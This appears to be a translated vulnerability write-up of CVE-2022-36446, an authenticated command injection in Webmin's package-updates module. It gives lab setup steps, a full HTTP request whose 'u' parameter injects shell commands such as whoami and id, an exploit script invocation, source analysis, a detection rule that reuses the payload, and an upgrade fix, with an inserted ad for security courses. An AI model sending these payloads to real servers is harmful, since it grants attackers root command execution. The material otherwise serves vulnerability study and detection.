0x01 Vulnerability Introduction
Vulnerability Level: Critical
Webmin is the most powerful web-based Unix system administration tool. The administrator accesses various management functions of Webmin through a browser and completes corresponding management actions. There is an arbitrary command injection vulnerability in Webmin before version 1.997, triggering this vulnerability requires logging into Webmin.
0x02 Vulnerability scope
WebMin version less than 1.997
0x03 exploit conditions
-
This vulnerability requires authentication;
-
And the account must have permission to access the software package update module, and access to the "Software Package Updates" module is required to trigger the vulnerability;
0x04 Vulnerability Reappearance
Environment build
1. Use vulhub to build the environment, and download vulhub to the local.
2. Enter vulhub/webmin/CVE0=-2019-15107, and use this environment to reproduce the CVE-2022-36446 vulnerability.
docker-compose up -d # 启动漏洞环境
docker-compose ps # 查看漏洞环境映射的端口
copy code
【Help safe learning one by one, get all resources one by one】
①Network security learning route
②20 penetration testing e-books
③Security offense and defense 357 pages of notes
④50 security offensive and defensive interview guides
⑤Security Red Team Penetration Toolkit
⑥ Necessary Books on Network Security
⑦100 actual combat cases of vulnerabilities
⑧Internal tutorials of security giants
3. Access https://ip:10000
, the following interface appears, indicating that the environment deployment is successful.
4. Next, you need to modify the password of webmin, and you need to enter the container to modify it.
docker ps # 查看漏洞环境容器id
docker exec -it 容器id /bin/bash # 进入容器内部
cd /usr/share/webmin/ # 进入容器内的/usr/share/webmin/目录下
./changepass.pl /etc/webmin root root # 将root密码设置为root
copy code
Vulnerability recurrence
1. After the above settings are completed, use root/root to log in to webmin.
2. Capture any data packets after login.
3. Send to the Repeater module, and change the request method to POST.
4. Change the request path to /package-updates/update.cgi, add payload, send the request, and return the command execution result in the package.
mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
copy code
POST /package-updates/update.cgi HTTP/1.1
Host: X.X.X.X:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-From: mount
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://X.X.X.X:10000/mount/?xnavigation=1
Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
mode=new&search=ssh&redir=&redirdesc=&u=0%3Bid%3B&confirm=Install%2BNow
copy code
EXP
Vulnerabilities can also be exploited directly through scripts, EXP address: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE .
python3 CVE-2022-36446.py -t https://X.X.X.X:10000/ -u root -p root -k -I
copy code
The following errors may occur
Change all CVE-2022-36446.py
in the file soup = BeautifulSoup(r.content, 'lxml')
to soup = BeautifulSoup(r.content, 'html.parser'), and execute again.
Vulnerability analysis
Command execution **:**
When the application needs to call an external program to process some content, it will use some functions to execute system commands, such as the most common system, exec, shell_exec and so on in php. When the user can control the parameters in the command execution function, some malicious system commands can be injected into normal commands, causing command execution attacks.
Webmin is currently the most powerful web-based Unix system management tool. Administrators access various management functions of webmin through a browser and complete corresponding management actions.
Webmin uses the operating system package manager (apt, yum, etc.) to perform package updates and installations. Due to the lack of input sanitization (software/apt-lib.pl in Webmin prior to 1.997 lacks HTML escaping for UI commands), it is possible to inject arbitrary commands that will connect to package manager calls.
This vulnerability requires authentication , and the account must have permission to access the package update module . Users can execute system commands during the installation of new packages and run commands with root privileges.
The module is developed under the /package-updates/ folder. There is an update.cgi file that specifies the user's package name with the parameter U on line 39, and checks for the presence of the "confirm" parameter in the request on line 50. On line 57, if there is no "confirm" parameter in the request, the "list_package_operations()" function is called with the variable "pkgnames", where the package names are stored.
You can tell from /package-updates/update.cgi
line 4 of the file that “list_package_operations”
the function is “pakage-updates-lib.pl”
in the file.
“list_package_operations()”
The function is defined on pakage-updates-lib.pl
line 408 of the file. This function sends the value of "$name", which is the package name, to “update_system_operations()”
the function in the file named software on line 412.
Then use the search function to find update_system_operations()
the files defining the functions as apt-lib.pl and yum-lib.pl.
As the names suggest, the apt-lib.pl file uses the apt package, and the yum-lib.pl file uses the yum package. The work done by the two is the same, but because the system running Webmin and the package manager of the system are different, only some commands in the file will be different, so any file can be analyzed
Looking at /software/apt-lib.pl
the file, the function is defined on line 75 update_system_operations()
. Line 83 “backquote_command()”
executes the system commands through the function, and also uses this function to control the security of the commands run by the system, and also prevents users from injecting commands here.
Continue to look at the update.cgi file. If a package needs to be installed, the "package_install()" function on line 129 will be called.
By searching, the package_install() function is located at line 300 in the "package-updates-lib.pl" file. Looking at the function content, it is found that the "update_system_install()" function is called through the "$name" variable, which is the package name given by the user on line 345 (from the previous analysis, these functions are in apt-lib.pl defined in the file).
Check the apt-lib.pl file again to find related functions.
Line 18 sees the function's first argument (which is the package name the user sent earlier) assigned to the "update" variable. On line 26, the "update" variable is included in the command without any control mechanism. Line 46 found that the relevant commands will be executed directly on the system without any control mechanism.
So, a user can execute commands on a system with root privileges by providing the "confirm" parameter in a new package install request and specifying in the package a value to run the command on the system.
0x05 Detect POC rule writing
params:
- mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
name: Webmin命令执行漏洞(CVE-2022-36446)
set: {}
rules:
- method: POST
path: /package-updates/update.cgi
headers:
Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6
body: mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"root")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
copy code
0x06 bug fix
1. Upgrade to version 1.997 and above 2. Patch acquisition